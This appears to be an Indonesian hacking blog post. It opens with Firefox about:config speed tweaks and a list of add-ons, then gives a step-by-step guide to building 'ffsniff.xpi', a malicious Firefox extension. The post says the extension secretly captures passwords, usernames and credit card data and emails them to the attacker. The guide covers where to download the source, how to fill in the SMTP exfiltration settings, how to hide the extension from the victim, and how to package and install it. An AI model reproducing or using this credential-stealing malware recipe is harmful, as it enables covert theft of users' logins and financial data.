Modzilla Fire Fox adalah sebuah software yang tergolong open source !!! Jika anda seorang hacker, maka adalah bijak jika anda menggunakan open source software sebagai peralatan pendukung anda. Rata – rata hacker menggunakan open source sebagai software pendukungnya. Mengapa ?? Apa karena software tersebut gratisan??? Sekali lagi tidak!!! Para hacker memilih open source software karena begitu mudahnya software – software tersebut di modifikasi sesuai dengan kebutuhan hacker tersebut.
>>How To modified Modzilla FireFox???
Hmm,,,,sekarang saya akan coba tunjukan salah satu dari berbagai contoh bagaimana FireFox di modifikasi demi keuntungan kita sendiri. Seperti yang kita tau bersama , Modzilla FireFox memiliki kecepatan browsing, surfing, download, upload yang luar biasa. Melalui port 80 pada sistim operasi , modzilla firefox melakukan aksinya dengan spektakuler, Jika anda pengguna browser ini, maka kecepatan yang selama ini anda nikmati sebenarnya belum mencapai speed yang maximal….
Bisakah modzilla FireFox running lebih cepat lagi??
Ya !! tentu saja , anda dapat mengubah firefox menjadi Fast FireFox dengan langkah – langkah berikut ini :
1. Buka firefox anda
2. Pada Address bar/URL bar ( kolom alamat ) ketik “ about:config ” ( tanda kutip tidak perlu di ketik )
3. Tekan Enter
4. Perhatikan firefox akan memberi peringatan pada anda agar berhati – hati dalam menggunakan vitur ini . Tekan tombol “ ya saya akan berhati-hati”
5. Apa yang anda lihat ?? ok anda melihat sebuah table yang berisi konfigurasi menu firefox , dimana anda akan mengubah parameters firefox sesuai dengan keperluan anda . Sekali lagi begitulah kelebihan open source software
6. Ubah parameter – parameter di bawah ini dan firefox konfigurasi menu akan mengubah nya secara otomatic jika anda mengklik kiri dua kali ( double click )
7. Ubah parameter – parameter di bawah ini :
• browser.tabs.showSingleWindowModePrefs – true
• network.http.max-connections – 48
• network.http.max-connections-per-server – 16
• network.http.max-persistent-connections-per-proxy – 8
• network.http.max-persistent-connections-per-server – 4
• network.http.pipelining – true
• network.http.pipelining.maxrequests – 100
• network.http.proxy.pipelining – true
• network.http.request.timeout – 300
8. Klik kanan di sembarang tempat pada konfigurasi table/List dan tambahkan ( add ) new integer. Beri nama nglayout.initialpaint.delay kemudian setting valuenya menjadi “0”
Selamat anda baru saja men tune-up modzilla firefox anda.
>> Senjata Pamungkas : ADD-ONS
Sekarang anda sadar dengan kelebihan modzilla dan jika anda memiliki insting hacker anda mengerti apa yang saya maksudkan. Nah selain anda dapat memodifikasikan lewat config table, anda juga dapat memodifikasi firefox dengan menggunakan Add-ons. Jika saya menjelaskan anda dengan kata-kata sederhana maka add-ons adalah sebuah aplikasi tambahan yang dapat dengan mudah anda install di modzilla firefox untuk kebutuhan tertentu. Mozilla Firefox dapat mendukung kita dalam dunia surfing, hacking dan cracking, bahkan dapat digunakan untuk memanipulasi cookies, Syntax SQL Injection, Proxy, dan lain sebagai. Karena itu semua di dukung dengan adanya add-ons.
Contoh add-ons yang biasa dipergunakan seorang hackers atau crackers
> Add N Edit Cookies
https://addons.mozilla.org/en-US/firefox/addon/573
Update, menambahkan, atau menghapus cookie hidup. Edit Cookie memungkinkan Anda untuk mengubah cookie dari Tampilan yang nyaman. Bagus untuk situs web pengujian, terutama keamanan tes!
> Cipherfox
https://addons.mozilla.org/en-US/firefox/addon/8919
CipherFox akan menampilkan saat ini digunakan SSL / TLS dan memecahkan keysize dalam status bar Firefox. Tambahan, fitur opsional yang CipherFox Anda dapat menonaktifkan enkripsi RC4 dalam panel pilihan. Enkripsi RC4 akan dinonaktifkan untuk semua situs, dan selanjutnya tersedia sandi akan digunakan, AES (misalnya Gmail) atau Tripel-des (mis. Newegg) pada hampir semua kasus. Dengan opsi yang memungkinkan, suatu "Aktifkan RC4" Pilihan ini ditambahkan ke menu Tools untuk segera beralih status nol bila diperlukan.
> Copycode
https://addons.mozilla.org/en-US/firefox/addon/9507
Untuk mendapatkan code source dari suatu halaman website ( HTML ) secara text HTML format
> Firebug
https://addons.mozilla.org/firefox/addon/1843
Firebug (Pembakar) Dengan add-ons ini, anda dapat mengedit, debug, dan monitor CSS, HTML, dan JavaScript tinggal di setiap halaman web. Kunjungi website firebug untuk dokumentasi, screen shot, dan forum diskusi:
http://getfirebug.com
Dan masih banyak lagi add-ons yang dapat anda temukan di peti harta karun yang -tersimpan di balik tabir rubah api. Nah bisakah anda membuat add-ons sendiri ?? Sekali lagi inilah yang membuat saya semakin tergila-gila dengan modzilla firefox. Ya jawaban saya hanya YA,,,tentu saja anda dapat membuat add-ons sendiri dengan menggunakan beberapa software tertentu. Hmm want some sample ??
Ok , ini adalah salah satu add-ons favorite saya namanya ffsniff.xpi. Dengan add-ons ini anda dapat mencuri setiap data baik berupa password, user name, creditcard bahkan setiap aktivitas dariPC atau perangkat komputer tersebut. Kemudian mengirim semua data tersebut ke email anda!! Benar – benar fantastis bukan Tentu saja selama perangkat tersebut menggunakan aplikasi modzilla yang telah diinstall add-ons ffsniff.xpi. Apa itu xpi ?? xpi adalah salah satu ekstention yang akan dibaca modzilla sebagai installasi add-ons nya…
Xpi bukanlah sejenis exe sebenarya .xpi adalah sebuah zip folder biasa namun menggunakan installasi yang sedikit berbeda.
Ok deh langsung aja ya,,,,,
> Membuat paket instalasi ffsniff.xpi
Peralatan perang yang anda butuhkan:
- Macromedia Dreamweaver ( versi berapa aja untuk ngedit javascript ) sebenarnya pake notepad boleh juga kok
- 7 – zip soalnya Ini lebih lengkap bisa untuk compress data ke .JAR dan .XPI
- Modzilla Firefox ( ya iyalah harus ada , gimana sih )
- Kopi bagi para penikmat kopi disarankan kopi item
- Kalo bisa sebungkus rokok,,hehehehe
ok langkah awal, kita buat dulu paket instalasinya dengan mendownload code sourcenya terlebih dahulu di http://azurit.elbiahosting.sk/ffsniff/ daripada capek2 iya gak?? Mending download trus edit , kartu lama hackers copasdit ( copy paste edit ) halah
ok kalo udah selesai di download , file tar.gz itu terdiri dari :
pkg_creator.py
src/
src/install.rdf
src/chrome/
src/chrome/content/
src/chrome/content/ffsniff/
src/chrome/content/ffsniff/ffsniffOverlay.xul
src/chrome/content/ffsniff/ffsniffOverlay_orig.js
src/chrome/content/ffsniff/contents.rdf
periksa pada folder yang telah didownload dan temukan file ffsniffOverlay.js, itu harus kita edit dengan cara mengcopy file ffsniffOverlay_orig.js dalam nama ffsniffOverlay.js. Setelah itu ffsniffOverlay.js kita edit dengan mengubah beberapa variabel berikut:
var send_from_host = "";
var send_from = "";
var send_to = "";
var subject = "";
var smtp_host = "";
var smtp_port = "";
var enable_hide = "";
var send_from_host harus kita isikan dengan domain penanggung jawab email address kita jika kita menggunakan yahoo.com maka harap diisikan yahoo.com atau telkom.net .
Untuk mencari var smtp host perhatikan Penjelasan di bawah ini:
variabel-variabel tersebut adalah parameter untuk mengirim email melalui smtp. smtp_host berisi alamat smtp server yang dipakai untuk mengirim email. Sebaiknya Gunakan smtp server yang bertanggung jawab untuk domain email yang kita tuju, dalam kasus ini domain email tujuan adalah @ymail.com Oleh karena itu saya harus mencari smtp server yang bertanggung jawab untuk domain telkom.net.
Cara mencarinya adalah dengan melihat MX record dari DNS telkom.net. Anda bisa gunakan layanan dnswatch.info untuk mencari MX record yahoo.com. anda akan mendapatkan domain yang bertanggung jawab terhadap email tersebut.
Sedangkan send from dan send to , tolong diisikan dengan email address anda karena javascript akan menggunakan script untuk mengirim secara otomatis ke email yang anda perlukan
Var enable_hide diisikan dengan dengan "no" atau "yes" jadi jika anda memilih yes maka addon akan disembunyikan oleh modzilla sehingga korban tidak curiga dengan perangkap kita.
Var smtp_port kita isikan dengan 25 karena port email biasanya menggunakan port 25 untuk protokolnya. Semua yang anda edit tadi sebenarnya merupakan Javascript yang akan memerintahkan firefox mengirim semua data dan password dari suatu situs ke alamat email anda sesuai dengan informasi yang ada pada JS tersebut
Contoh ffsniffOverlay.js yang telah di edit adalah
var send_from_host = "ymail.com";
var send_from = "zee_eichel@ymail.com";
var send_to = "zee_eichel@ymail.com’;
var subject = "Log Firefox Sniffer";
var smtp_host = “Penanggung jawab domain";
var smtp_port = "25";
var enable_hide = "no";
> Membuat file ffsniff.jar
Setelah variabel-variabel di file ffsniffOverlay.js sudah diubah, langkah berikutnya adalah membuat file ffsniff.jar. Walaupun ekstensi filenya adalah jar, sebenarnya ini adalah file zip biasa. File-file yang dimasukkan dalam ffsniff.jar adalah:
content/ffsniff/contents.rdf
content/ffsniff/ffsniffOverlay.js
content/ffsniff/ffsniffOverlay.xul
> Membuat file ffsniff.xpi
Setelah kita selesai membuat file ffsniff.jar, selanjutnya kita buat paket instalasi ffsniff.xpi. File ini juga file zip biasa, walaupun ekstensinya .xpi. Isi file ffsniff.xpi adalah dua file berikut:
install.rdf
chrome/ffsniff.jar
Jangan lupa juga ffsniff.jar harus dizip dalam folder chrome. Jangan sampai urutannya salah ok!!! Nah gampangkan?, sekarang add-ons siap diisntall ke dalam firefox.
Cara installnya gampil amit kok tinggal buka firefox nya , nah pada address bar masukin path / lokasi penyimpanan ffsniff.xpi nya nah tinggal go deh,,,
Tidak ada komentar:
Posting Komentar